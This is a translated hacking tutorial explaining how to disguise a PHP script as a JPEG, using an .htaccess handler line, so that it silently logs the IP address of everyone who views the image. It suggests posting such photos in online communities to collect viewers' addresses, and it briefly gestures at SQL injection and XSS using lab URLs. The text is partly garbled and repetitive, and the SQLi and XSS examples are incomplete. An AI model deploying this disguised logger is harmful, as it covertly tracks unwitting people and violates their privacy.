In this tutorial, we will learn how to use a photo to steal IP addresses. My idea is to modify the. htaccess file and parse the jpg file as a PHP file. If you are interested, join us. In this tutorial, we will learn how to use a photo to steal IP addresses. My idea is to modify the. htaccess file and parse the jpg file as a PHP file.
The following is the code we need to add to. htaccess:
AddHandler application/x-httpd-php5. jpg
Copy the following code to your notebook and name it grabber.jpg.
<?php$fh = fopen(‘ip_list.txt', ‘a');fwrite($fh, $_SERVER[‘REMOTE_ADDR'].”“);fclose($fh);$im = imagecreatefromjpeg(“n00b.png”);header(‘Content-Type: image/jpeg');imagejpeg($im);imagedestroy($im);?>
In the same directory.
In this way, everything is ready. When someone browses grabber.jpg, his IP address is recorded.
(Translator's note: we need to upload these things to our personal website space)
POC:
(Note: The author posted a demo photo of an ip address that can be obtained. For the sake of privacy, I didn't post it. Readers can go to the author's blog to check it)
So far, our photos are ready to work.
Then I want to explain how to use SQLi to obtain the IP address. In fact, using photos to steal IP addresses is very fast. We have no reason to use the SQLi method, but to give readers more knowledge, I 'd like to explain it:
Http://leettime.net/sqlninja.com/tasks/basic_ch1.php? Id = 1' union select 1, values, 3 #
Now let's talk about how to use xss to get the IP Address:
Http://leettime.net/xsslab1/chalg1.php? Name = & submit = Search
Okay, that's all.
We can use this technique to do a lot of interesting things. In fact, most communities allow us to publish some photos, so we can use this method to get the IP addresses of all people who access our photos.
The above section describes how to use PHP to obtain IP addresses from photos. I hope it will be helpful to you!